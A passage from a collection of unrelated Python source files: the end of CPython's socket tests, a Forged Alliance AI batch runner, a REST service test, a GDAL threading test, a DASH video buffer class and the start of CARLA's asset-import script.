_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
if not os.path.isfile("/proc/modules"):
return False
with open("/proc/modules") as f:
for line in f:
if line.startswith("tipc "):
return True
if support.verbose:
print("TIPC module is not loaded, please 'sudo modprobe tipc'")
return False
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen(5)
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# The is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
@unittest.skipUnless(thread, 'Threading required for this test.')
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(socket.error, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(socket.error, sock.sendall, b'foo')
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@unittest.skipUnless(fcntl, "module fcntl not available")
class CloexecConstantTest(unittest.TestCase):
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertTrue(s.type & socket.SOCK_CLOEXEC)
self.assertTrue(fcntl.fcntl(s, fcntl.F_GETFD) & fcntl.FD_CLOEXEC)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertTrue(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), timeout)
else:
self.assertFalse(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), None)
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timout value isn't transfered.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest, UDPTimeoutTest ]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
FileObjectInterruptedTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
CloexecConstantTest,
NonblockConstantTest
])
if hasattr(socket, "socketpair"):
tests.append(BasicSocketPairTest)
if hasattr(socket, "AF_UNIX"):
tests.append(TestUnixDomain)
if sys.platform == 'linux':
tests.append(TestLinuxAbstractNamespace)
if isTipcAvailable():
tests.append(TIPCTest)
tests.append(TIPCThreadableTest)
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
])
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
run_batch.py
|
import threading, subprocess, os, random, time, json
import pygetwindow as gw
N = 8
root = "C:\\ProgramData\\FAForever\\"
cwd = os.getcwd()
logDir = cwd+"\\output\\"
resultPath = cwd+"\\results.txt"
print(cwd)
if not os.path.isdir(logDir):
os.mkdir(logDir)
if not os.path.isdir(root):
print("Unable to find FAForever folder!")
exit()
factionDict = {
"Random": 0,
"UEF": 1,
"Aeon": 2,
"Cybran": 3,
"Seraphim": 4,
}
# Minimise windows with "Forged Alliance" in title
obnoxious = True
# In seconds
maxGameTime = 45*60
"""
Some AI keys for your convenience:
"rush" - Rush AI
"sorianrush" - Sorian AI Rush
"RNGStandard" - RNG Standard AI
"DalliConstAIKey" - Dalli AI
"uvesorush" - Uveso Rush AI
"swarmterror" - Swarm Terror AI
To find the AI key of any given AI, look in the \\lua\\AI\\CustomAIs_v2 directory in the mod files.
"""
dup = 1
exps = [
# Format: {"map": "<path to map scenario.lua>", "ais": [(<spawn index>, <AI key>, <faction string (see factionDict)>)] }
{"map": "SCMP_007", "ais": [(1, "rush", "UEF"), (2, "sorianrush", "Random")]},
{"map": "SCMP_007", "ais": [(2, "rush", "UEF"), (1, "sorianrush", "Random")]},
]
print(len(exps))
random.shuffle(exps)
def get_result(fp,res):
try:
with open(fp) as f:
for line in f:
if "AutoRunEndResult|" in line:
res["results"].append(line[:-1].split("|",1)[1])
if "victory" in line:
winner_index = int(line.split("|")[1])
res["winners"].append(winner_index)
except Exception as e:
print("Exception: {}".format(e))
return res
def run_experiments(exps):
slots = [None for _ in range(N)]
done = False
lock = threading.Lock()
exp_num = 0
with open(resultPath,"w") as f:
# Clean the results file for this batch
f.write("")
while not done:
done = True
# Kickoff threads
for i in range(N):
if slots[i] == None or not slots[i].is_alive():
if exp_num < len(exps):
slots[i] = threading.Thread(target=run_exp,args=(exps[exp_num],lock))
slots[i].start()
exp_num += 1
done = False
break
elif slots[i].is_alive():
done = False
# Minimise windows
if obnoxious:
for w in gw.getWindowsWithTitle("Forged Alliance"):
if not w.isMinimized:
w.minimize()
# And wait...
time.sleep(10)
def run_exp(exp,lock):
# Separate log files with a random ID
id = "".join([random.choice("1234567890ABCDEF") for _ in range(8)])
logfile = logDir+"log_"+id
args = [
root+"bin\\ForgedAlliance.exe",
"/nobugreport", "/nosound", "/exitongameover",
"/init", root+"bin\\init_autorun.lua",
"/map", exp["map"],
"/log", logfile,
"/maxtime", str(maxGameTime),
"/aitest", mk_test_string(exp["ais"])
]
subprocess.call(args)
exp["results"] = []
exp["winners"] = []
result = get_result(logfile+".sclog",exp)
os.remove(logfile+".sclog")
lock.acquire()
with open(resultPath,"a") as f:
f.write(json.dumps(result)+"\n")
lock.release()
def mk_test_string(ais):
res = ",".join(["{}:{}:{}".format(ai[0],ai[1],factionDict[ai[2]]) for ai in ais])
return res
start = time.time()
run_experiments(exps)
print("Time taken: {}s".format(round(time.time()-start)))
|
online.py
|
'''
Online tests
'''
import unittest
from unittest import TestCase
from mock import MagicMock
import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
from rest_service import RestService
import time
import requests
from threading import Thread
class TestRestService(TestCase):
# random port number for local connections
port_number = 62976
def setUp(self):
self.rest_service = RestService("localsettings.py")
self.rest_service.setup()
self.rest_service.settings['FLASK_PORT'] = self.port_number
def run_server():
self.rest_service.run()
self._server_thread = Thread(target=run_server)
self._server_thread.setDaemon(True)
self._server_thread.start()
# sleep 10 seconds for everything to boot up
time.sleep(10)
def test_status(self):
r = requests.get('http://127.0.0.1:{p}'.format(p=self.port_number))
results = r.json()
self.assertEqual(results['node_health'], 'GREEN')
def tearDown(self):
self.rest_service.close()
if __name__ == '__main__':
unittest.main()
|
thread_test.py
|
#!/usr/bin/env pytest
# -*- coding: utf-8 -*-
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: Test Python threading
# Author: Even Rouault <even dot rouault at spatialys.com>
#
###############################################################################
# Copyright (c) 2016, Even Rouault <even dot rouault at spatialys dot com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import threading
try:
import numpy # noqa
numpy_available = True
except ImportError:
numpy_available = False
from osgeo import gdal
import pytest
def my_error_handler(err_type, err_no, err_msg):
# pylint: disable=unused-argument
pass
def thread_test_1_worker(args_dict):
for i in range(1000):
ds = gdal.Open('data/byte.tif')
if (i % 2) == 0:
if ds.GetRasterBand(1).Checksum() != 4672:
args_dict['ret'] = False
else:
ds.GetRasterBand(1).ReadAsArray()
for i in range(1000):
gdal.PushErrorHandler(my_error_handler)
ds = gdal.Open('i_dont_exist')
gdal.PopErrorHandler()
def test_thread_test_1():
if not numpy_available:
pytest.skip()
threads = []
args_array = []
for i in range(4):
args_dict = {'ret': True}
t = threading.Thread(target=thread_test_1_worker, args=(args_dict,))
args_array.append(args_dict)
threads.append(t)
t.start()
ret = 'success'
for i in range(4):
threads[i].join()
if not args_array[i]:
ret = 'fail'
return ret
|
dash_buffer.py
|
import queue
import threading
import time
import csv
import os
import config_dash
from stop_watch import StopWatch
# Durations in seconds
PLAYER_STATES = ['INITIALIZED', 'INITIAL_BUFFERING', 'PLAY',
'PAUSE', 'BUFFERING', 'STOP', 'END']
EXIT_STATES = ['STOP', 'END']
class DashPlayer:
""" DASH buffer class """
def __init__(self, video_length, segment_duration):
config_dash.LOG.info("Initializing the Buffer")
self.player_thread = None
self.playback_start_time = None
self.playback_duration = video_length
self.segment_duration = segment_duration
#print "video_length = {}".format(video_length)
#print "segment_duration = {}".format(segment_duration)
# Timers to keep track of playback time and the actual time
self.playback_timer = StopWatch()
self.actual_start_time = None
# Playback State
self.playback_state = "INITIALIZED"
self.playback_state_lock = threading.Lock()
# Buffer size
if config_dash.MAX_BUFFER_SIZE:
self.max_buffer_size = config_dash.MAX_BUFFER_SIZE
else:
self.max_buffer_size = video_length
# Duration of the current buffer
self.buffer_length = 0
self.buffer_length_lock = threading.Lock()
# Buffer Constants
self.initial_buffer = config_dash.INITIAL_BUFFERING_COUNT
self.alpha = config_dash.ALPHA_BUFFER_COUNT
self.beta = config_dash.BETA_BUFFER_COUNT
self.segment_limit = None
self.time_limit = None
# Current video buffer that holds the segment data
self.buffer = queue.Queue()
self.buffer_lock = threading.Lock()
self.current_segment = None
self.buffer_log_file = config_dash.BUFFER_LOG_FILENAME
config_dash.LOG.info("VideoLength={},segmentDuration={},MaxBufferSize={},InitialBuffer(secs)={},"
"BufferAlph(secs)={},BufferBeta(secs)={}".format(self.playback_duration,
self.segment_duration,
self.max_buffer_size, self.initial_buffer,
self.alpha, self.beta))
def set_state(self, state):
""" Function to set the state of the player"""
state = state.upper()
if state in PLAYER_STATES:
self.playback_state_lock.acquire()
config_dash.LOG.info("Changing state from {} to {} at {} Playback time ".format(self.playback_state, state,
self.playback_timer.time()))
self.playback_state = state
self.playback_state_lock.release()
else:
config_dash.LOG.error("Unidentified state: {}".format(state))
def initialize_player(self):
"""Method that update the current playback time"""
start_time = time.time()
initial_wait = 0
paused = False
buffering = False
interruption_start = None
config_dash.LOG.info("Initialized player with video length {}".format(self.playback_duration))
while True:
# Video stopped by the user
if self.playback_state == "END":
config_dash.LOG.info("Finished playback of the video: {} seconds of video played for {} seconds".format(
self.playback_duration, time.time() - start_time))
config_dash.JSON_HANDLE['playback_info']['end_time'] = time.time()
self.playback_timer.pause()
return "STOPPED"
if self.playback_state == "STOP":
# If video is stopped quit updating the playback time and exit player
config_dash.LOG.info("Player Stopped at time {}".format(
time.time() - start_time))
config_dash.JSON_HANDLE['playback_info']['end_time'] = time.time()
self.playback_timer.pause()
self.log_entry("Stopped")
return "STOPPED"
# If paused by user
if self.playback_state == "PAUSE":
if not paused:
# do not update the playback time. Wait for the state to change
config_dash.LOG.info("Player Paused after {:4.2f} seconds of playback".format(
self.playback_timer.time()))
self.playback_timer.pause()
paused = True
continue
# If the playback encounters buffering during the playback
if self.playback_state == "BUFFERING":
if not buffering:
config_dash.LOG.info("Entering buffering stage after {} seconds of playback".format(
self.playback_timer.time()))
self.playback_timer.pause()
buffering = True
interruption_start = time.time()
config_dash.JSON_HANDLE['playback_info']['interruptions']['count'] += 1
# If the size of the buffer is greater than the RE_BUFFERING_DURATION then start playback
else:
# If the RE_BUFFERING_DURATION is greate than the remiang length of the video then do not wait
remaining_playback_time = self.playback_duration - self.playback_timer.time()
if ((self.buffer.qsize() >= config_dash.RE_BUFFERING_COUNT) or (
config_dash.RE_BUFFERING_COUNT * self.segment_duration >= remaining_playback_time
and self.buffer.qsize() > 0)):
buffering = False
if interruption_start:
interruption_end = time.time()
interruption = interruption_end - interruption_start
config_dash.JSON_HANDLE['playback_info']['interruptions']['events'].append({
"timeframe": (interruption_start, interruption_end),
"segment_number": self.current_segment['segment_number'],
})
config_dash.JSON_HANDLE['playback_info']['interruptions']['total_duration'] += interruption
config_dash.LOG.info("Duration of interruption = {}".format(interruption))
interruption_start = None
self.set_state("PLAY")
self.log_entry("Buffering-Play")
if self.playback_state == "INITIAL_BUFFERING":
if self.buffer.qsize() < config_dash.INITIAL_BUFFERING_COUNT:
initial_wait = time.time() - start_time
continue
else:
config_dash.LOG.info("Initial Waiting Time = {}".format(initial_wait))
config_dash.JSON_HANDLE['playback_info']['initial_buffering_duration'] = initial_wait
config_dash.JSON_HANDLE['playback_info']['start_time'] = time.time()
self.set_state("PLAY")
self.log_entry("InitialBuffering-Play")
if self.playback_state == "PLAY":
# Check of the buffer has any segments
if self.playback_timer.time() == self.playback_duration:
self.set_state("END")
self.log_entry("Play-End")
if self.buffer.qsize() == 0:
config_dash.LOG.info("Buffer empty after {} seconds of playback".format(
self.playback_timer.time()))
self.playback_timer.pause()
self.set_state("BUFFERING")
self.log_entry("Play-Buffering")
continue
# Read one the segment from the buffer
# Acquire Lock on the buffer and read a segment for it
self.buffer_lock.acquire()
play_segment = self.buffer.get()
self.current_segment = play_segment
self.buffer_lock.release()
config_dash.LOG.info("Reading the segment number {} with length {} from the buffer at playtime {}".format(
play_segment['segment_number'], play_segment["playback_length"], self.playback_timer.time()))
self.log_entry(action="StillPlaying", bitrate=play_segment["bitrate"])
# Calculate time playback when the segment finishes
future = self.playback_timer.time() + play_segment['playback_length']
# Start the playback
self.playback_timer.start()
while self.playback_timer.time() < future:
# If playback hasn't started yet, set the playback_start_time
if not self.playback_start_time:
self.playback_start_time = time.time()
config_dash.LOG.info("Started playing with representation {} at {}".format(
play_segment['bitrate'], self.playback_timer.time()))
# Duration for which the video was played in seconds (integer)
if self.playback_timer.time() >= self.playback_duration:
config_dash.LOG.info("Completed the video playback: {} seconds".format(
self.playback_duration))
self.playback_timer.pause()
self.set_state("END")
self.log_entry("TheEnd")
return
else:
self.buffer_length_lock.acquire()
self.buffer_length -= play_segment['playback_length']
config_dash.LOG.debug("Decrementing buffer_length by {}. dash_buffer = {}".format(
play_segment['playback_length'], self.buffer_length))
self.buffer_length_lock.release()
if self.segment_limit:
if int(play_segment['segment_number']) >= self.segment_limit:
self.set_state("STOP")
config_dash.LOG.info("Stopped playback after segment {} at playtime {}".format(
play_segment['segment_number'], self.playback_duration))
if self.time_limit is not None:
if self.playback_timer.time() >= self.time_limit:
self.set_state("STOP")
config_dash.LOG.info("Stopped playback after segment {} at playtime {}".format(
play_segment['segment_number'], self.playback_duration))
def write(self, segment):
""" write segment to the buffer.
Segment is dict with keys ['data', 'bitrate', 'playback_length', 'URI', 'size']
"""
# Acquire Lock on the buffer and add a segment to it
if not self.actual_start_time:
self.actual_start_time = time.time()
config_dash.JSON_HANDLE['playback_info']['start_time'] = self.actual_start_time
config_dash.LOG.info("Writing segment {} at time {}".format(segment['segment_number'],
time.time() - self.actual_start_time))
self.buffer_lock.acquire()
self.buffer.put(segment)
self.buffer_lock.release()
self.buffer_length_lock.acquire()
self.buffer_length += segment['playback_length']
config_dash.LOG.debug("Incrementing buffer_length by {}. dash_buffer = {}".format(
segment['playback_length'], self.buffer_length))
self.buffer_length_lock.release()
self.log_entry(action="Writing", bitrate=segment['bitrate'])
def start(self):
""" Start playback"""
self.set_state("INITIAL_BUFFERING")
self.log_entry("Starting")
config_dash.LOG.info("Starting the Player")
self.player_thread = threading.Thread(target=self.initialize_player)
self.player_thread.daemon = True
self.player_thread.start()
self.log_entry(action="Starting")
def stop(self):
"""Method to stop the playback"""
self.set_state("STOP")
self.log_entry("Stopped")
config_dash.LOG.info("Stopped the playback")
def log_entry(self, action, bitrate=0):
"""Method to log the current state"""
if self.buffer_log_file:
header_row = None
if self.actual_start_time:
log_time = time.time() - self.actual_start_time
else:
log_time = 0
if not os.path.exists(self.buffer_log_file):
header_row = "EpochTime,CurrentPlaybackTime,CurrentBufferSize,CurrentPlaybackState,Action,Bitrate".split(",")
stats = (log_time, str(self.playback_timer.time()), self.buffer.qsize(),
self.playback_state, action,bitrate)
else:
stats = (log_time, str(self.playback_timer.time()), self.buffer.qsize(),
self.playback_state, action,bitrate)
str_stats = [str(i) for i in stats]
with open(self.buffer_log_file, "a") as log_file_handle:
result_writer = csv.writer(log_file_handle, delimiter=",")
if header_row:
result_writer.writerow(header_row)
result_writer.writerow(str_stats)
config_dash.LOG.info("BufferStats: EpochTime=%s,CurrentPlaybackTime=%s,CurrentBufferSize=%s,"
"CurrentPlaybackState=%s,Action=%s,Bitrate=%s" % tuple(str_stats))
|
Import.py
|
#!/usr/bin/env python
# Copyright (c) 2019 Computer Vision Center (CVC) at the Universitat Autonoma de
# Barcelona (UAB).
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
"""Import Assets to Carla"""
from __future__ import print_function
import errno
import fnmatch
import json
import os
import shutil
import subprocess
import argparse
import threading
# Global variables
IMPORT_SETTING_FILENAME = "importsetting.json"
SCRIPT_NAME = os.path.basename(__file__)
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
# Go two directories above the current script
CARLA_ROOT_PATH = os.path.normpath(SCRIPT_DIR + '/../..')
def get_packages_json_list(folder):
"""Returns a list with the paths of each package's json
files that has been found recursively in the input folder.
"""
json_files = []
for root, _, filenames in os.walk(folder):
for filename in fnmatch.filter(filenames, "*.json"):
if filename != "roadpainter_decals.json":
json_files.append([root, filename])
return json_files
def get_decals_json_file(folder):
for root, _, filenames in os.walk(folder):
for filename in fnmatch.filter(filenames, "roadpainter_decals.json"):
return filename
return ""
def generate_json_package(folder, package_name, use_carla_materials):
"""Generate a .json file with all the maps it founds on the folder
and subfolders. A map is a .fbx and a .xodr with the same name.
"""
json_files = []
# search for all .fbx and .xodr pair of files
maps = []
for root, _, filenames in os.walk(folder):
files = fnmatch.filter(filenames, "*.xodr")
for file_name in files:
xodr = file_name[:-5]
# check if exist the .fbx file
if os.path.exists("%s/%s.fbx" % (root, xodr)):
maps.append([os.path.relpath(root, folder), xodr, ["%s.fbx" % xodr]])
else:
# check if exist the map by tiles
tiles = fnmatch.filter(filenames, "*_Tile_*.fbx")
if (len(tiles) > 0):
maps.append([os.path.relpath(root, folder), xodr, tiles])
# write the json
if (len(maps) > 0):
# build all the maps in .json format
json_maps = []
for map_name in maps:
path = map_name[0].replace('\\', '/')
name = map_name[1]
tiles = map_name[2]
tiles = ["%s/%s" % (path, x) for x in tiles]
map_dict = {
'name': name,
'xodr': '%s/%s.xodr' % (path, name),
'use_carla_materials': use_carla_materials
}
# check for only one 'source' or map in 'tiles'
if (len(tiles) == 1):
map_dict['source'] = tiles[0]
else:
map_dict['tile_size'] = 2000
map_dict['tiles'] = tiles
# write
json_maps.append(map_dict)
# build and write the .json
f = open("%s/%s.json" % (folder, package_name), "w")
my_json = {'maps': json_maps, 'props': []}
serialized = json.dumps(my_json, sort_keys=False, indent=3)
f.write(serialized)
f.close()
# add
json_files.append([folder, "%s.json" % package_name])
return json_files
def generate_decals_file(folder):
# search for all .fbx and .xodr pair of files
maps = []
for root, _, filenames in os.walk(folder):
files = fnmatch.filter(filenames, "*.xodr")
for file_name in files:
xodr = file_name[:-5]
# check if exist the .fbx file
if os.path.exists("%s/%s.fbx" % (root, xodr)):
maps.append([os.path.relpath(root, folder), xodr, ["%s.fbx" % xodr]])
else:
# check if exist the map by tiles
tiles = fnmatch.filter(filenames, "*_Tile_*.fbx")
if (len(tiles) > 0):
maps.append([os.path.relpath(root, folder), xodr, tiles])
if (len(maps) > 0):
# build all the maps in .json format
json_decals = []
for map_name in maps:
name = map_name[1]
#create the decals default config file
json_decals.append({
'map_name' : name,
'drip1': '10',
'drip3': '10',
'dirt1': '10',
'dirt3' : '10',
'dirt4' : '10',
'dirt5': '10',
'roadline1': '20',
'roadline5': '20',
'tiremark1': '20',
'tiremark3': '20',
'tarsnake1': '10',
'tarsnake3': '20',
'tarsnake4': '10',
'tarsnake5': '20',
'tarsnake11': '20',
'cracksbig1': '10',
'cracksbig3': '10',
'cracksbig5': '10',
'cracksbig8': '10',
'mud1' : '10',
'mud5' : '10',
'oilsplat1' : '20',
'oilsplat2' : '20',
'oilsplat3' : '20',
'oilsplat4' : '20',
'oilsplat5' : '20',
'gum' : '30',
'crack1': '10',
'crack3' : '10',
'crack4' : '10',
'crack5' : '10',
'crack8': '10',
'decal_scale' : {
'x_axis' : '1.0',
'y_axis' : '1.0',
'z_axis' : '1.0'},
'fixed_decal_offset': {
'x_axis' : '15.0',
'y_axis' : '15.0',
'z_axis' : '0.0'},
'decal_min_scale' : '0.3',
'decal_max_scale' : '0.7',
'decal_random_yaw' : '360.0',
'random_offset' : '50.0'
});
# build and write the .json
f = open("%s/%s.json" % (folder, 'roadpainter_decals'), "w")
my_json = {'decals': json_decals}
serialized = json.dumps(my_json, sort_keys=False, indent=3)
f.write(serialized)
f.close()
def invoke_commandlet(name, arguments):
"""Generic function for running a commandlet with its arguments."""
ue4_path = os.environ["UE4_ROOT"]
uproject_path = os.path.join(CARLA_ROOT_PATH, "Unreal", "CarlaUE4", "CarlaUE4.uproject")
run = "-run=%s" % (name)
if os.name == "nt":
sys_name = "Win64"
editor_path = "%s/Engine/Binaries/%s/UE4Editor" % (ue4_path, sys_name)
command = [editor_path, uproject_path, run]
command.extend(arguments)
print("Commandlet:", command)
subprocess.check_call(command, shell=True)
elif os.name == "posix":
sys_name = "Linux"
editor_path = "%s/Engine/Binaries/%s/UE4Editor" % (ue4_path, sys_name)
full_command = "%s %s %s %s" % (editor_path, uproject_path, run, " ".join(arguments))
